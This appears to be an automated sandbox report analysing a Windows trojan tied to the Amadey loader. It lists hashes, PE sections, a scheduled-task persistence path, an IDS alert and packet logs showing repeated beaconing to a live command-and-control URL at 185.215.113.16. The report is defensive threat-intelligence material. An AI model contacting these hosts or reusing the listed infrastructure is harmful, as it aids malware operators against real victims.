                                                        http://185.215.113.16/Jo89Ku7d/index.php$BGaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                                          unknown
                                                          http://185.215.113.16/Jo89Ku7d/index.phpncodedlBaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                                            unknown
                                                            http://185.215.113.16/Jo89Ku7d/index.phptaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                                              unknown
                                                              http://185.215.113.16/Jo89Ku7d/index.phpdedgBaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                                                unknown
                                                                http://185.215.113.16/Jo89Ku7d/index.php1axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  unknown
                                                                  http://185.215.113.16/Jo89Ku7d/index.phpncodedaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    unknown
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    185.215.113.16
                                                                    unknownPortugal
                                                                    206894WHOLESALECONNECTIONSNLtrue
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1520715
                                                                    Start date and time:2024-09-27 19:03:05 +02:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 5m 50s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:8
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:file.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@5/3@1/1
                                                                    EGA Information:
                                                                    • Successful, ratio: 25%
                                                                    HCA Information:Failed
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target axplong.exe, PID 7612 because there are no executed function
                                                                    • Execution Graph export aborted for target axplong.exe, PID 7620 because there are no executed function
                                                                    • Execution Graph export aborted for target file.exe, PID 7424 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • VT rate limit hit for: file.exe
                                                                    TimeTypeDescription
                                                                    13:05:01API Interceptor228382x Sleep call for process: axplong.exe modified
                                                                    18:04:04Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    185.215.113.16file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                                                                    • 185.215.113.16/Jo89Ku7d/index.php
                                                                    file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                    • 185.215.113.16/Jo89Ku7d/index.php
                                                                    file.exeGet hashmaliciousAmadeyBrowse
                                                                    • 185.215.113.16/Jo89Ku7d/index.php
                                                                    file.exeGet hashmaliciousAmadeyBrowse
                                                                    • 185.215.113.16/Jo89Ku7d/index.php
                                                                    file.exeGet hashmaliciousAmadeyBrowse
                                                                    • 185.215.113.16/Jo89Ku7d/index.php
                                                                    8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                                                                    • 185.215.113.16/soka/random.exe
                                                                    file.exeGet hashmaliciousAmadeyBrowse
                                                                    • 185.215.113.16/Jo89Ku7d/index.php
                                                                    file.exeGet hashmaliciousAmadeyBrowse
                                                                    • 185.215.113.16/Jo89Ku7d/index.php
                                                                    file.exeGet hashmaliciousAmadeyBrowse
                                                                    • 185.215.113.16/Jo89Ku7d/index.php
                                                                    file.exeGet hashmaliciousAmadeyBrowse
                                                                    • 185.215.113.16/Jo89Ku7d/index.php
                                                                    No context
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                    • 185.215.113.37
                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 185.215.113.37
                                                                    file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                                                                    • 185.215.113.16
                                                                    file.exeGet hashmaliciousStealcBrowse
                                                                    • 185.215.113.37
                                                                    kYpONUhAR5.exeGet hashmaliciousRedLineBrowse
                                                                    • 185.215.113.67
                                                                    file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                    • 185.215.113.103
                                                                    file.exeGet hashmaliciousStealcBrowse
                                                                    • 185.215.113.37
                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 185.215.113.37
                                                                    file.exeGet hashmaliciousStealcBrowse
                                                                    • 185.215.113.37
                                                                    file.exeGet hashmaliciousAmadeyBrowse
                                                                    • 185.215.113.16
                                                                    No context
                                                                    No context
                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1949184
                                                                    Entropy (8bit):7.950080713754448
                                                                    Encrypted:false
                                                                    SSDEEP:49152:yZG2dyiQpYbjL9e9kMxKRVvpOxFgUYqLDICctTPzsTcD:zDGbNOk+KRdpsFgDmstzhD
                                                                    MD5:572146DA15EDF1DAAC1B337A71D9A1F7
                                                                    SHA1:5535C753E8A7985AA95D1BADA3163E82BA037931
                                                                    SHA-256:34B6C45D4626A404FA0B29C42D6C4850687FDB6B57E22708CD719653878BC8F3
                                                                    SHA-512:14E2384AA523BEC4E6A10ABA2ED33122D4E85FEC5E4FDF6876FCC607B9A468D00514CFD826F9533E75CF4CC0A2640AFAAB3496361DC5659CA0B12A9FFD02BAA9
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 53%
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................0M...........@..........................`M.....c.....@.................................W...k.............................M...............................M..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...wygwfpzp.....p2.....................@...puucqgap..... M.....................@....taggant.0...0M.."..................@...........................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Reputation:high, very likely benign file
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):286
                                                                    Entropy (8bit):3.428082396979352
                                                                    Encrypted:false
                                                                    SSDEEP:6:xQRj5XpRKUEZ+lX1lOJUPelkDdtPjgsW2YRZuy0lbCt0:xqjFpRKQ1lOmeeDHjzvYRQVet0
                                                                    MD5:6B3CADD452C914DAF07623BBB735CB6F
                                                                    SHA1:7FB6DCA031A93EDEC356BBB5AE63542ED792F348
                                                                    SHA-256:7B9E4CFCBBF8A52E784E6E291B63F9907D6D0AF4088426D02BC90A3070C2B5E1
                                                                    SHA-512:66C32B112E7ED3DFC961F127BFE6642D1F49FA8B7E8C87660E5141CB0B0FD0D71C9C9298F19D0A4B2BDC255E0A1747635D26447C2752E380BBA0397B0A6CD944
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:..../.2.p5.H..n...T.F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.950080713754448
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:file.exe
                                                                    File size:1'949'184 bytes
                                                                    MD5:572146da15edf1daac1b337a71d9a1f7
                                                                    SHA1:5535c753e8a7985aa95d1bada3163e82ba037931
                                                                    SHA256:34b6c45d4626a404fa0b29c42d6c4850687fdb6b57e22708cd719653878bc8f3
                                                                    SHA512:14e2384aa523bec4e6a10aba2ed33122d4e85fec5e4fdf6876fcc607b9a468d00514cfd826f9533e75cf4cc0a2640afaab3496361dc5659ca0b12a9ffd02baa9
                                                                    SSDEEP:49152:yZG2dyiQpYbjL9e9kMxKRVvpOxFgUYqLDICctTPzsTcD:zDGbNOk+KRdpsFgDmstzhD
                                                                    TLSH:B89533882CF4FF19E1B6EC384BEA70B95A0D177B0C449252DE2661A921F5F4FC799870
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                                                                    Icon Hash:90cececece8e8eb0
                                                                    Entrypoint:0x8d3000
                                                                    Entrypoint Section:.taggant
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:6
                                                                    OS Version Minor:0
                                                                    File Version Major:6
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:6
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                    Instruction
                                                                    jmp 00007FD6488A441Ah
                                                                    setl byte ptr [00000000h]
                                                                    add cl, ch
                                                                    add byte ptr [eax], ah
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax+03h], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add dword ptr [eax+00000000h], eax
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    jnle 00007FD6488A4392h
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    out dx, eax
                                                                    add al, byte ptr [eax]
                                                                    add byte ptr [esi], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [ecx], al
                                                                    add byte ptr [eax], 00000000h
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add dword ptr [eax+00000000h], 00000000h
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4d0fe40x10wygwfpzp
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x4d0f940x18wygwfpzp
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    0x10000x680000x2de004cec7a0f10f37722275498f440fb277aFalse0.9973337448910081data7.984881564074441IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x690000x1e00x200d80046ecd18d6d7f0527f3c7be88fc1aFalse0.578125data4.537600421104909IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    0x6b0000x2bc0000x2008cdab02883b39b1908324435a68f2e54unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    wygwfpzp0x3270000x1ab0000x1aa200b716671160ae351b7dce8cc3d637e6d1False0.994612147990613data7.954236015998608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    puucqgap0x4d20000x10000x60056d787d9f3d4041b954fd4815fe88841False0.6119791666666666data5.267444705735488IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .taggant0x4d30000x30000x220018e6985e20a4f81bfa7a1635abb9054dFalse0.0685891544117647DOS executable (COM)0.7914104558190661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_MANIFEST0x4d0ff40x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                    DLLImport
                                                                    kernel32.dlllstrcpy
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-09-27T19:05:15.617414+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.462769185.215.113.1680TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Sep 27, 2024 19:05:03.274578094 CEST6275980192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:03.279546976 CEST8062759185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:03.279634953 CEST6275980192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:03.279798985 CEST6275980192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:03.284671068 CEST8062759185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:04.634599924 CEST8062759185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:04.635782957 CEST8062759185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:04.635863066 CEST6275980192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:04.637388945 CEST8062759185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:04.637434959 CEST6275980192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:04.637726068 CEST6275980192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:04.643321991 CEST8062759185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:04.879264116 CEST8062759185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:04.880899906 CEST6275980192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:04.994091988 CEST6275980192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:04.994395018 CEST6276080192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:04.999181986 CEST8062760185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:04.999247074 CEST6276080192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:04.999316931 CEST6276080192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:04.999563932 CEST8062759185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:04.999609947 CEST6275980192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:05.005024910 CEST8062760185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:05.719552994 CEST8062760185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:05.719604015 CEST6276080192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:05.720820904 CEST6276080192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:05.725636005 CEST8062760185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:05.949501038 CEST8062760185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:05.949563026 CEST6276080192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:06.056582928 CEST6276080192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:06.056864023 CEST6276180192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:06.062462091 CEST8062760185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:06.062474966 CEST8062761185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:06.062530994 CEST6276080192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:06.062553883 CEST6276180192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:06.062747955 CEST6276180192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:06.067840099 CEST8062761185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:06.773173094 CEST8062761185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:06.773262024 CEST6276180192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:06.774979115 CEST6276180192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:06.779885054 CEST8062761185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:07.005067110 CEST8062761185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:07.005136013 CEST6276180192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:07.119103909 CEST6276180192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:07.119376898 CEST6276280192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:07.124152899 CEST8062762185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:07.124233007 CEST6276280192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:07.124268055 CEST8062761185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:07.124317884 CEST6276180192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:07.124454021 CEST6276280192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:07.129173994 CEST8062762185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:07.845071077 CEST8062762185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:07.845240116 CEST6276280192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:07.845870972 CEST6276280192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:07.850681067 CEST8062762185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:08.076653004 CEST8062762185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:08.076742887 CEST6276280192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:08.228867054 CEST6276280192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:08.234078884 CEST8062762185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:08.234147072 CEST6276280192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:08.267081022 CEST6276380192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:08.272098064 CEST8062763185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:08.272176981 CEST6276380192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:08.272320986 CEST6276380192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:08.277102947 CEST8062763185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:08.993936062 CEST8062763185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:08.994014978 CEST6276380192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:08.994999886 CEST6276380192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:08.999797106 CEST8062763185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:09.317238092 CEST8062763185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:09.317295074 CEST6276380192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:09.432118893 CEST6276380192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:09.432419062 CEST6276480192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:09.437338114 CEST8062764185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:09.437417030 CEST6276480192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:09.437510967 CEST6276480192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:09.437541962 CEST8062763185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:09.437597990 CEST6276380192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:09.442311049 CEST8062764185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:10.163738012 CEST8062764185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:10.163845062 CEST6276480192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:10.164438963 CEST6276480192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:10.169223070 CEST8062764185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:10.399038076 CEST8062764185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:10.399127007 CEST6276480192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:10.510458946 CEST6276480192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:10.510788918 CEST6276580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:10.516541004 CEST8062764185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:10.516655922 CEST6276480192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:10.516758919 CEST8062765185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:10.516836882 CEST6276580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:10.517086029 CEST6276580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:10.522789955 CEST8062765185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:11.242234945 CEST8062765185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:11.242414951 CEST6276580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:11.376559973 CEST6276580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:11.381439924 CEST8062765185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:11.606090069 CEST8062765185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:11.606332064 CEST6276580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:11.713301897 CEST6276580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:11.714199066 CEST6276680192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:11.718606949 CEST8062765185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:11.718709946 CEST6276580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:11.718969107 CEST8062766185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:11.719094992 CEST6276680192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:11.719474077 CEST6276680192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:11.724234104 CEST8062766185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:12.437840939 CEST8062766185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:12.437910080 CEST6276680192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:12.440521002 CEST6276680192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:12.447343111 CEST8062766185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:12.671224117 CEST8062766185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:12.671314001 CEST6276680192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:12.775355101 CEST6276680192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:12.775652885 CEST6276780192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:12.780633926 CEST8062766185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:05:12.780697107 CEST6276680192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:05:12.780791044 CEST8062767185.215.113.16192.168.2.4
